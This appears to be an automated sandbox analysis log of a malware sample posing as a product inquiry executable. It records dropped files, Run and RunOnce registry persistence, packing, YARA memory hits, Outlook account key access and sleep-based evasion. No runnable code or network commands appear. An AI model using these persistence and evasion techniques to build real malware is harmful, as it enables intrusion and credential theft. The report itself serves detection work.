              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: oleacc.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: shfolder.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: oleacc.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: shfolder.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: oleacc.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: shfolder.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeAutomated click: OK
              Source: C:\Windows\SysWOW64\svchost.exeAutomated click: OK
              Source: C:\Windows\SysWOW64\svchost.exeAutomated click: OK
              Source: C:\Windows\SysWOW64\svchost.exeAutomated click: OK
              Source: C:\Windows\SysWOW64\svchost.exeAutomated click: OK
              Source: C:\Windows\SysWOW64\svchost.exeAutomated click: OK
              Source: C:\Windows\SysWOW64\svchost.exeAutomated click: OK
              Source: C:\Windows\SysWOW64\svchost.exeAutomated click: OK
              Source: C:\Windows\SysWOW64\svchost.exeAutomated click: OK
              Source: C:\Windows\SysWOW64\svchost.exeAutomated click: OK
              Source: C:\Windows\SysWOW64\svchost.exeAutomated click: OK
              Source: C:\Windows\SysWOW64\svchost.exeAutomated click: OK
              Source: C:\Windows\SysWOW64\svchost.exeAutomated click: OK
              Source: C:\Windows\SysWOW64\svchost.exeAutomated click: OK
              Source: C:\Windows\SysWOW64\svchost.exeAutomated click: OK
              Source: C:\Windows\SysWOW64\svchost.exeAutomated click: OK
              Source: C:\Windows\SysWOW64\svchost.exeAutomated click: OK
              Source: C:\Windows\SysWOW64\svchost.exeAutomated click: OK
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\ProgramData\Vexplo\Vexploio.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: INQUIRY#46789-MAY_24_PRODUCTS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Source: C:\ProgramData\Vexplo\Vexploio.exeUnpacked PE file: 11.2.Vexploio.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\ProgramData\Vexplo\Vexploio.exeUnpacked PE file: 12.2.Vexploio.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\ProgramData\Vexplo\Vexploio.exeUnpacked PE file: 13.2.Vexploio.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: Yara matchFile source: Process Memory Space: INQUIRY#46789-MAY_24_PRODUCTS.exe PID: 6064, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Vexploio.exe PID: 548, type: MEMORYSTR
              Source: Yara matchFile source: 00000006.00000002.178537015512.0000000005239000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.178258681536.0000000005139000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 3_2_6E131A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,3_2_6E131A98
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 3_2_6E132F20 push eax; ret 3_2_6E132F4E
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 6_2_6F272F20 push eax; ret 6_2_6F272F4E
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 7_2_351E2806 push ecx; ret 7_2_351E2819
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_0044693D push ecx; ret 11_2_0044694D
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DB84
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DBAC
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_00451D54 push eax; ret 11_2_00451D61
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dllJump to dropped file
              Source: C:\ProgramData\Vexplo\Vexploio.exeFile created: C:\Users\user\AppData\Local\Temp\nsv9D4E.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\ProgramData\Vexplo\Vexploio.exeJump to dropped file
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\bloue\Geofaglig.exeJump to dropped file
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\ProgramData\Vexplo\Vexploio.exeJump to dropped file

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-RXKA3PJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-RXKA3PJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce grewmJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\BemangleJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywortJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\SuperingenuityJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Superingenuity\Gravedo.FlaJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Superingenuity\Krapyls172.sygJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Superingenuity\physostome.SlnJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Superingenuity\Mattias.napJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Superingenuity\Sestertius.djvJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Superingenuity\Slidsomt.braJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Superingenuity\afkontrollere.urbJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Superingenuity\miljankensJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Superingenuity\miljankens\afslres.tenJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Superingenuity\miljankens\discomposed.nonJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Superingenuity\miljankens\dred.jpgJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Superingenuity\miljankens\gametophoric.txtJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Superingenuity\miljankens\isocola.solJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Superingenuity\miljankens\malningerne.bogJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Superingenuity\miljankens\monodomous.kalJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Superingenuity\miljankens\ornery.cemJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Superingenuity\miljankens\podagrist.refJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Superingenuity\miljankens\BetakeJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Superingenuity\miljankens\Betake\soliloquium.borJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Superingenuity\miljankens\Betake\thoroughwort.retJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\SporeJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Spore\torminal.wesJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce grewmJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce grewmJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce grewmJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce grewmJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-RXKA3PJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-RXKA3PJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-RXKA3PJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-RXKA3PJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
              Source: C:\ProgramData\Vexplo\Vexploio.exeWindow / User API: threadDelayed 4770Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exeWindow / User API: threadDelayed 1371Jump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dllJump to dropped file
              Source: C:\ProgramData\Vexplo\Vexploio.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv9D4E.tmp\System.dllJump to dropped file
              Source: C:\ProgramData\Vexplo\Vexploio.exeAPI coverage: 5.3 %
              Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 9.0 %
              Source: C:\ProgramData\Vexplo\Vexploio.exe TID: 7388Thread sleep count: 99 > 30Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exe TID: 7388Thread sleep time: -297000s >= -30000sJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exe TID: 8040Thread sleep count: 50 > 30Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exe TID: 8040Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exe TID: 8040Thread sleep count: 4770 > 30Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exe TID: 8040Thread sleep time: -14310000s >= -30000sJump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exe TID: 7388Thread sleep count: 1371 > 30Jump to behavior
              Source: C:\ProgramData\Vexplo\Vexploio.exe TID: 7388Thread sleep time: -4113000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 3_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,3_2_00405768
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 3_2_004062A3 FindFirstFileA,FindClose,3_2_004062A3
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 3_2_004026FE FindFirstFileA,3_2_004026FE
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 5_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_00405768
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 5_2_004026FE FindFirstFileA,5_2_004026FE
              Source: C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exeCode function: 5_2_004062A3 FindFirstFileA,FindClose,5_2_004062A3
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 7_2_351E10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_351E10F1
              Source: C:\ProgramData\Vexplo\Vexploio.exeCode function: 7_2_351E6580 FindFirstFileExA,7_2_351E6580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,10_2_00405768
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_004026FE FindFirstFileA,10_2_004026FE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_004062A3 FindFirstFileA,FindClose,10_2_004062A3
